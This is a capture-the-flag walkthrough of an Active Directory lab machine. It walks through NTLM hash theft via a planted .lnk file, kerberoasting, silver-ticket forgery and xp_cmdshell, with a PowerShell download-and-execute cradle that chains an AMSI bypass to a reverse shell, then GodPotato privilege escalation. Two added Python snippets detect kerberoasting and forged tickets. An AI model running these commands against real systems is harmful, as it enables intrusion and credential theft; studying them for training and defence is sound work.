Breach is a Windows Medium box that starts with Guest authentication to SMB shares. Having read/write on one share, we upload an .lnk file and capture a user's NTLMv2 hash. Once cracked, those credentials are used to kerberoast accounts with SPNs, which yields a TGS hash for the svc_mssql user. Since svc_mssql is a service account, we can forge a silver ticket. With it we connect to the MSSQL instance as Administrator and run commands via xp_cmdshell; only after bypassing AMSI do we get a reverse shell. Once on the machine, checking our privileges shows SeImpersonatePrivilege is available. Using GodPotato we create a user, add them to the Administrators group, and connect as that admin via evil-winrm.

Initial Nmap

PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-28 00:08:14Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB

Authenticating as Guest (empty password) gives us access to the shares on the DC.

$ nxc smb 10.10.92.126 -u Guest -p '' --shares

SMB 10.10.92.126 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.10.92.126 445 BREACHDC [+] breach.vl\Guest:
SMB 10.10.92.126 445 BREACHDC [*] Enumerated shares
SMB 10.10.92.126 445 BREACHDC Share Permissions Remark
SMB 10.10.92.126 445 BREACHDC ----- ----------- ------
SMB 10.10.92.126 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.92.126 445 BREACHDC C$ Default share
SMB 10.10.92.126 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.92.126 445 BREACHDC NETLOGON Logon server share
SMB 10.10.92.126 445 BREACHDC share READ,WRITE
SMB 10.10.92.126 445 BREACHDC SYSVOL Logon server share
SMB 10.10.92.126 445 BREACHDC Users READ

We have READ,WRITE on the share named share. Listing it recursively shows three directories, and transfer contains a folder per user.

smbmap -u Guest -p '' -d breach.vl -H 10.10.92.126 -R share
[+] IP: 10.10.92.126:445 Name: breachdc.breach.vl
Disk Permissions Comment
---- ----------- -------
share READ, WRITE
.\share\*
dr--r--r-- 0 Thu Mar 27 19:29:56 2025 .
dr--r--r-- 0 Thu Feb 17 09:38:00 2022 ..
dr--r--r-- 0 Thu Mar 27 19:25:05 2025 finance
dr--r--r-- 0 Thu Feb 17 05:19:13 2022 software
dr--r--r-- 0 Thu Mar 27 19:25:26 2025 transfer
.\share\finance\*
dr--r--r-- 0 Thu Mar 27 19:25:05 2025 .
dr--r--r-- 0 Thu Mar 27 19:29:56 2025 ..
.\share\software\*
dr--r--r-- 0 Thu Mar 27 19:25:17 2025 .
dr--r--r-- 0 Thu Mar 27 19:29:56 2025 ..
.\share\transfer\*
dr--r--r-- 0 Thu Mar 27 19:25:26 2025 .
dr--r--r-- 0 Thu Mar 27 19:29:56 2025 ..
dr--r--r-- 0 Thu Feb 17 05:23:51 2022 claire.pope
dr--r--r-- 0 Thu Feb 17 05:23:22 2022 diana.pope
dr--r--r-- 0 Thu Feb 17 05:24:39 2022 julia.wong

NTLM Theft

We can drop an .scf or .lnk file into the writable share and see whether anyone browses to the folder; a user who does will have their client authenticate to our listener, leaking an NTLMv2 hash.

$ python3 ntlm_theft.py --generate lnk --server 10.8.4.29 --filename freeCandy
Created: freeCandy/freeCandy.lnk (BROWSE TO FOLDER)
Generation Complete.

$ impacket-smbclient 'breach.vl/Guest@breach.vl' -no-pass
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
share
SYSVOL
Users
# use share
# ls
drw-rw-rw- 0 Fri Mar 28 08:16:30 2025 .
drw-rw-rw- 0 Thu Feb 17 09:38:00 2022 ..
drw-rw-rw- 0 Thu Feb 17 05:19:36 2022 finance
drw-rw-rw- 0 Thu Feb 17 05:19:13 2022 software
drw-rw-rw- 0 Thu Feb 17 08:00:35 2022 transfer
# cd transfer
# ls
drw-rw-rw- 0 Thu Feb 17 08:00:35 2022 .
drw-rw-rw- 0 Fri Mar 28 08:16:30 2025 ..
drw-rw-rw- 0 Thu Feb 17 05:23:51 2022 claire.pope
drw-rw-rw- 0 Thu Feb 17 05:23:22 2022 diana.pope
drw-rw-rw- 0 Thu Feb 17 05:24:39 2022 julia.wong
# put freeCandy.lnk
# exit

We put the file in the transfer folder, where the user directories are, then start Responder and wait for a hit.

$ sudo responder -I tun0

[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.92.126
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:0526add1eaef5104:1DD6932CED548FA48BD4BED2516A3E02:01010000000000008061771E4D9FDB018B3185DF3D296F610000000002000800570041004100560001001E00570049004E002D00360042003100300033004F00470059004D004B<SNIP>
[*] Skipping previously captured hash for BREACH\Julia.Wong


Once the hash is cracked, we can collect BloodHound data and build a list of domain users by RID brute-forcing with the new credentials.

$ nxc smb breach.vl -u julia.wong -p <SNIP> --rid-brute | grep SidTypeUser | cut -d '\' -f2 | awk '{print $1}' > users.list

Kerberoasting

As a general rule of thumb, once we have credentials we try kerberoasting. We use this user's credentials to check which accounts have SPNs set.

$ GetUserSPNs.py 'breach.vl/julia.wong:<SNIP>'         
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 04:43:08.106169 2025-03-28 08:08:15.526819

$ GetUserSPNs.py 'breach.vl/julia.wong:<SNIP>' -request-user svc_mssql
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 04:43:08.106169 2025-03-28 08:08:15.526819

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$94460cab00e138498318d889ae9d858d$ebfbc9219ec245123242aa4a3b5408c548d7dd7afb1926b61936c422b74fed99f0414f59d3cad89f18afc227c4d0275048a11c91816eae8248d9fa69e1f30ccb77b76020f07ea4452f2af9352e1817f92a9758a4099e76402df858ecb54abb9f170179107dff4fb442b7a5437a348476398b0459<SNIP>

We get a hit on svc_mssql; cracking the TGS hash gives us a cleartext credential we can use against MSSQL on the open port 1433.
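From the defender's side, the request above leaves a Windows Security event 4769 on the DC: the `$krb5tgs$23$` prefix of the captured hash means the ticket was requested with RC4 (etype 23 = 0x17), which GetUserSPNs.py asks for by default. The following is an added example (not from the writeup) that flags such requests over constructed 4769 records; field names follow the 4769 event schema, and the sweep threshold is an assumption.

```python
from collections import defaultdict

# RC4-HMAC (0x17) and RC4-HMAC-EXP (0x18). A "$krb5tgs$23$" hash is etype 23 == 0x17.
RC4_ETYPES = {"0x17", "0x18"}
# Assumed threshold: this many distinct user-owned SPNs requested by one principal
# from one address is treated as a roasting sweep even if the etype is AES.
SWEEP_THRESHOLD = 3

SAMPLE_4769 = [  # constructed sample events, not captured from the box
    {"TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.8.4.29", "Status": "0x0"},
    {"TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "BREACHDC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.92.50", "Status": "0x0"},
    {"TargetUserName": "BREACHDC$@BREACH.VL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::1", "Status": "0x0"},
    {"TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.8.4.29", "Status": "0x1B"},
]


def is_user_service(name):
    """SPNs owned by user accounts are the roastable ones; machine accounts and krbtgt are not."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def is_rc4_roast(ev):
    """A successful RC4 service-ticket request for a user-owned SPN."""
    return (is_user_service(ev["ServiceName"])
            and ev.get("Status", "0x0") == "0x0"
            and ev["TicketEncryptionType"].lower() in RC4_ETYPES)


def find_kerberoast(events):
    """Return {(requester, source_ip): sorted service accounts} for requesters to alert on."""
    rc4_hits = defaultdict(set)
    all_services = defaultdict(set)
    for ev in events:
        if ev.get("Status", "0x0") != "0x0":
            continue  # failed requests carry no usable ticket
        key = (ev["TargetUserName"], ev["IpAddress"])
        if is_user_service(ev["ServiceName"]):
            all_services[key].add(ev["ServiceName"])
        if is_rc4_roast(ev):
            rc4_hits[key].add(ev["ServiceName"])
    alerts = {}
    for key, services in all_services.items():
        if key in rc4_hits or len(services) >= SWEEP_THRESHOLD:
            alerts[key] = sorted(services)
    return alerts
```

The RC4 rule misses an account that is AES-only (the request would then be etype 0x12), which is why the distinct-SPN count is kept as a second signal; forcing AES on service accounts and using long random passwords (or gMSAs) is the mitigation for the roast itself.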

Silver Ticket Attack

Since we have valid credentials for a service account (the MSSQL service), we can forge a silver ticket that grants us administrative rights when we connect to the MSSQL instance. Connecting with the svc_mssql credentials directly does not give us the ability to run commands:

$ impacket-mssqlclient 'breach.vl/svc_mssql:<SNIP>@breach.vl' -windows-auth
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\svc_mssql guest@master)> enable_xp_cmdshell
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (BREACH\svc_mssql guest@master)>


So we use impacket-ticketer to create the ticket. First we need to convert the password to an NT hash, which we did with a converter online. Then we need the domain SID, which can be obtained a couple of ways: Impacket tools such as lookupsid or getPac, nxc, or BloodHound data. Then we create the ticket. Make sure to use // when entering the service, or you will get an error when Kerberos looks for the ticket. This is only in some cases; at least it was for me.

$ impacket-getPac 'breach.vl/svc_mssql:<SNIP>' -targetUser 'svc_mssql'
<SNIP>
ResourceGroupDomainSid: NULL
ResourceGroupCount: 0
ResourceGroupIds: NULL
Domain SID: S-1-5-21-2330692793-3312915120-706255856

$ impacket-ticketer -nthash '0006C7AA1E800E17F8E78870E2000' -spn 'MSSQLSvc//breachdc.breach.vl:1433' -domain 'breach.vl' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -user-id '500' Administrator
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

After creating the ticket, we export it into our credential cache and connect using Kerberos.

$ export KRB5CCNAME=Administrator.ccache
$ impacket-mssqlclient -dc-ip 10.10.112.98 -k -no-pass 'breach.vl/Administrator@breach.vl' -windows-auth -debug
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.13.0.dev0+20241024.90011.835e1755-py3.11.egg/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: Administrator.ccache
[+] SPN MSSQLSVC/:1433@BREACH.VL not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for MSSQLSVC/@BREACH.VL
[+] Using TGS from cache
[+] Changing sname from MSSQLSvc/@BREACH.VL to MSSQLSVC/:1433@BREACH.VL and hoping for the best
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)>
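The key property of a silver ticket is that the KDC never sees it: the Administrator logon above reaches SQL Server with no corresponding service-ticket request on the DC. The following is an added example (not from the writeup) that correlates host Kerberos logons (event 4624) against DC ticket issuance (event 4769) to surface such logons. Sample events are constructed; the service-account name comes from the GetUserSPNs output, and the ISO timestamps, the 10-hour window and the event field names are assumptions.

```python
from datetime import datetime, timedelta

# Assumed: MSSQLSvc/breachdc.breach.vl:1433 is owned by svc_mssql, so a legitimate
# Kerberos logon to SQL Server must be preceded by a 4769 with ServiceName svc_mssql.
# Default TGS lifetime is 10 hours; a renewal would log a fresh 4769.
SERVICE_ACCOUNT = "svc_mssql"
MAX_TICKET_AGE = timedelta(hours=10)

DC_4769 = [  # constructed: service tickets the KDC actually issued
    {"time": "2025-03-28T08:08:15", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "svc_mssql"},
]
HOST_4624 = [  # constructed: logons recorded on the SQL host
    {"time": "2025-03-28T08:09:40", "TargetUserName": "julia.wong", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.8.4.29"},
    {"time": "2025-03-28T11:14:02", "TargetUserName": "Administrator", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.8.4.29"},
    {"time": "2025-03-28T11:15:10", "TargetUserName": "svc_mssql", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.8.4.29"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def kdc_issued_ticket(logon, tgs_events):
    """True if the DC issued this user a ticket for SERVICE_ACCOUNT within the window before the logon."""
    user = logon["TargetUserName"].lower()
    when = _ts(logon["time"])
    for ev in tgs_events:
        if ev["ServiceName"].lower() != SERVICE_ACCOUNT:
            continue
        principal = ev["TargetUserName"].split("@")[0].lower()
        age = when - _ts(ev["time"])
        if principal == user and timedelta(0) <= age <= MAX_TICKET_AGE:
            return True
    return False


def find_unissued_kerberos_logons(host_events, tgs_events):
    """Kerberos network logons on the host with no matching 4769 on the DC: forged-ticket candidates."""
    return [ev for ev in host_events
            if ev["AuthenticationPackageName"] == "Kerberos"
            and ev["LogonType"] == "3"
            and not kdc_issued_ticket(ev, tgs_events)]
```

This only works if "Audit Kerberos Service Ticket Operations" is enabled on the DC and logon auditing on the SQL host (on this box both are BREACHDC); the durable fix is a strong or managed password for svc_mssql so its key cannot be cracked from a roasted ticket in the first place.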

Now we can run commands. After enabling xp_cmdshell we run the following with our listener and web server up:

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell echo IEX((New-Object Net.WebClient).DownloadString("http://10.8.4.29/a2.ps1")) | powershell -noprofile
---
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.112.98 - - [28/Mar/2025 11:16:18] "GET /a2.ps1 HTTP/1.1" 200 -
10.10.112.98 - - [28/Mar/2025 11:16:58] "GET /cradle.ps1 HTTP/1.1" 200 -
10.10.112.98 - - [28/Mar/2025 11:16:59] "GET /sm.ps1 HTTP/1.1" 200 -
  • a2.ps1 is an AMSI bypass that, once finished, reaches out again for cradle.ps1.
  • cradle.ps1 reaches out again for the reverse shell.
  • sm.ps1 is the full reverse shell, a Nishang one-liner.


This gets us a reverse shell. Finally!

PrivEsc

$ rlwrap nc -lvnp 9002                                                                           
listening on [any]9002 ...
connect to [10.8.4.29] from (UNKNOWN) [10.10.112.98]58767
PS C:\Windows\system32> cd \programdata
PS C:\programdata> ls

Checking our privileges shows the easy way up: SeImpersonatePrivilege is enabled.

SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled

We transferred GodPotato over, created a user, and added them to the Administrators group.

PS C:\programdata> .\GP.exe -cmd "cmd /c net user das Password123! /add && net localgroup Administrators das /add"
[*] CombaseModule: 0x140728437833728
[*] DispatchTable: 0x140728440424312
[*] UseProtseqFunction: 0x140728439716656
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\3d715370-aea5-445c-99d8-44b10fe45380\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000a002-020c-ffff-8d0d-32b15ac3e33c
[*] DCOM obj OXID: 0x5accc6eeede9cc5
[*] DCOM obj OID: 0x3ea5b1981acb83fd
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 104 Token:0x756 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2084
The command completed successfully.

The command completed successfully.

Let's get on the system.

$ evil-winrm -i breach.vl -u das -p 'Password123!'

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\das\Documents> whoami /all
<SNIP>
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
<SNIP>